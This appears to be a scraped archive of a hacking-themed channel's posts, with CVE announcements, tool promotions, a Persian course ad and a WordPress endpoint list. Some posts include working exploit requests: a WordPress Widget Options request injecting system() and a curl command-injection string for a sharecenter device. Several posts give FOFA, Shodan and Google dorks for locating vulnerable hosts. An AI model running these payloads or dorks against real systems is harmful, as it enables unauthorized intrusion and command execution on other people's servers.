HackTheBox Academy
Closed channel
🔴Learn About #Linux 🔴Learn About #Windows 🔴Learn About #CVE 🔴Learn About #EXPLOIT 🔴Learn About #Vulnerability ✅ADMIN : @NullByte0x1
Show more3 327
Subscribers
No data24 hours
-207 days
-9330 days
Posts Archive
3 327
↔️ CVE-2024-11680
❗️ ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Successful exploitation allows attackers to create accounts, upload webshells, and embed malicious JavaScript.
🖥 Exploit - POC
🔎ZoomEye:
app="ProjectSend"🔎fofa.info:
(title="Log In » " && header="Set-Cookie: PHPSESSID" && body="ckeditor.js" && body="jquery-migrate.min.js") || body="target=\"_blank\">ProjectSend"
#Ethical_Hacker #Exploit #RCE
#CVE #Pentest #Vulnerability
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security3 327
↔️ CVE-2024-11680
❗️ ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Successful exploitation allows attackers to create accounts, upload webshells, and embed malicious JavaScript.
🖥 Exploit - POC
🔎ZoomEye:
app="ProjectSend"🔎fofa.info:
(title="Log In » " && header="Set-Cookie: PHPSESSID" && body="ckeditor.js" && body="jquery-migrate.min.js") || body="target=\"_blank\">ProjectSend"
#Ethical_Hacker #Exploit #RCE
#CVE #Pentest #Vulnerability
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security3 327
↔️ CVE-2024-51378
❗️ getresetstatus in dns/views.py and ftp/views.py in CyberPanel before 1c0c6cb allows remote attackers to bypass authentication and execute arbitrary commands.
🖥 Exploit - POC
🔎hunter.how:
product.name="CyberPanel"🔎fofa.info:
app="CyberPanel"#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
GoFOFA is a command-line tool for the FOFA API written in Golang.
🖥 GitHub
#Tools #BugBounty #Security
#Vulnerability #Red_Team #Hunt
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
🧑💻 آموزش تست نفوذ را با ما تجربه کنید :
[+]تست نفوذ شبکه و وب و SOC را رایگان یاد بگیر .
[+]مهندسی اجتماعی را رایگان یاد بگیر .
[+]زبان C برای هکرها و فراتر از آن !
[+]ابزار نویسی با پایتون را رایگان یاد بگیر .
[+]مفاهیم پایه امنیت را با ما یاد بگیر .
[+]نکات و ابزار ها و کاربا ابزارهای امنیتی و مقاله های امنیت را در کانال ما دنبال کنید .
[+]پیش نیازهای ورود به دنیای تست نفوذ را با ما تجربه کنید .
[+]چگونه و از کجا هک را شروع کنیم ؟قبلاً فیلم هکرهایی را تماشا کرده اید؟
[+] پرینتر هکینگ
[+] اصول اولیه PowerShell و PowerShell Scripting را بیاموزید.
[+] مقدمه ای بر امنیت سایبری
[+] مینیدوره Linux command-line
[+] دوره جامع network+
🔖 و کلی مباحث و مفاهیم دیگر را با ما تجربه کنید .
⭕ به دنیای آموزش رایگان تست نفوذ خوش اومدید .
💠 @TryHackBox
3 327
🔠 URLFinder
⭐️ URLFinder is a high-speed, passive URL discovery tool designed to simplify and accelerate web asset discovery, ideal for penetration testers, security researchers, and developers looking to gather URLs without active scanning.
💫 Features:
💜 Curated Passive Sources to maximize comprehensive URL discovery
💜 Supports multiple output formats (JSON, file, stdout)
💜 Optimized for Speed and resource efficiency
💜 STDIN/OUT support for easy integration into existing workflows
🖥 GitHub
👩💻 Installation:
go install -v github.com/projectdiscovery/urlfinder/cmd/urlfinder@latest
#Web #Tools #Recon
#Pentest #Ethical_Hacker
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security3 327
↔️ CVE-2024-8672
❗️ The Widget Options – The #1 WordPress Widget & Block Control Plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.0.7
🖥 Exploit - POC
GET /wp-json/wp/v2/block-renderer/core/latest-comments?context=edit&attributes[commentsToShow]=5&attributes[displayAvatar]=true&attributes[displayDate]=true&attributes[displayExcerpt]=true&attributes[extended_widget_opts][class][logic]=system('sleep 5');&post_id=91&_locale=site HTTP/1.1
Host: localhost:5555
X-WP-Nonce: 365b68356c
Cookie: wordpress_logged_in_fake_cookie=invalid|123456789|fake_cookie
🔎 FOFA:
body="wp-content/plugins/widget-options/"🔎 Google:
inurl:"wp-content/plugins/widget-options/"#Web #Exploit #Vulnerability #CVE #Pentest #Ethical_Hacker ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
↔️ CVE-2024-38193
❗️ Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
🖥 Exploit - POC
#Ethical_Hacker #Exploit #Vulnerability
#CVE #Pentest #Privilege_Escalation
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
Repost from Sec WriteUp ~ CVE Alert
📌#WriteUp Community
***************
🗓Date: Tue, 03 Dec 2024 04:38:43 +0000
***************
✏️Title: Hackers Can Exploit Windows Driver Use-After-Free Vulnerability (CVE-2024-38193) to Gain Systems Privileges
***************
📎Link: https://cybersecuritynews.com/?p=85090
***************
⚙️Tags: #NEWS #Cyber_Security #Hacker_News
***************
♦️Join: @HackTheBox_Academy
♦️Join: @HackTheBox_Security
3 327
In last 3 days , We have a lot of new friends joining our channel,
but the number of members shown on the channel has decrease from 3520 to 3510.😂🤦♂️
is It Joke ? 😂😂😂
3 327
3 327
❗️ How To Detect and Exploit CVE-2024-10915.
🔎SHODAN:
http.html:"sharecenter"🔎FOFA:
body="sharecenter"
👩💻 POC:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;<INJECTED_SHELL_COMMAND>;%27"
☑️Thanks to the video provider.
#CVE #Exploit #Vulnerability
#Ethical_Hacker #Pentest #RCE
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security3 327
🔵 #WordPress Juicy End Points.
wp-admin.php wp-config.php wp-content/uploads wp-load wp-signup.php wp-json wp-includes index.php wp-login.php wp-links-opml.php wp-activate.php wp-blog-header.php wp-cron.php wp-links.php wp-mail.php xmlrpc.php wp-setting.php wp-trackback.php wp-signup.php admin-bar.php#Ethical_Hacker #Pentest #BugBounty ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
